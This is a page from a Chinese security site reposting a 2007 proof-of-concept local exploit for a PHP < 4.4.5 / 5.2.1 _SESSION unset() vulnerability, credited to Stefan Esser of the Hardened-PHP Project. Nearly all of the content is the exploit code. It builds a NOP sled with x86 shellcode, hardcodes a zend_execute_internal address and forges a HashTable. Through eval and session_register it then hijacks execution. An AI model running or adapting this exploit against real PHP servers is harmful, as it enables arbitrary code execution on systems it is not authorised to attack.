首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit 来源：Hardened-PHP 作者：Stefan 发布时间：2007-03-26   <?php   ////////////////////////////////////////////////////////////////////////   //  _  _                _                     _       ___  _  _  ___  //   // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //   // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //   // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //   //                                                                    //   //         Proof of concept code from the Hardened-PHP Project        //   //                   (C) Copyright 2007 Stefan Esser                  //   //                                                                    //   ////////////////////////////////////////////////////////////////////////   //                 PHP _SESSION unset() Vulnerability                 //   ////////////////////////////////////////////////////////////////////////   // This is meant as a protection against remote file inclusion.   die("REMOVE THIS LINE");   $PHP_MAJOR_VERSION = PHP_VERSION;   $PHP_MAJOR_VERSION = $PHP_MAJOR_VERSION[0];   $shellcode = str_repeat("\x90", 256).       "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".       "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".       "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".       "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".       "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".       "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".       "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65".       ($PHP_MAJOR_VERSION==4?"\x18\xb0\x53":"\x18\xb0\x83");   $zend_execute_internal = 0x08345b08;   $Hashtable = pack("LLLLLLLLLCCC", 2, 1, 0, 0, 0, $zend_execute_internal, 0, $zend_execute_internal, 0x66666666, 0, 0, 0);   eval('   session_start();   unset($HTTP_SESSION_VARS);   unset($_SESSION);   $x = "'.$Hashtable.'";   session_register($shellcode);'); ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·WarFTP 1.65 (USER) Remote Buff ·PHP < 4.4.5 / 5.2.1 _SESSION D ·PBlang <= 4.66z Remote Create ·PBlang 4.66z Remote Code Execu ·Mambo Module Flatmenu <= 1.07 ·Frontbase <= 4.2.7 Remote Buff ·Microsoft DNS Server (Dynamic ·PHP 5.2.1 with PECL phpDOC Loc ·0irc-client v1345 build2006082 ·MS Internet Explorer Recordset ·PortailPhp 2.0 (idnews) Remote ·FreeBSD mcweject 0.9 (eject) L   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved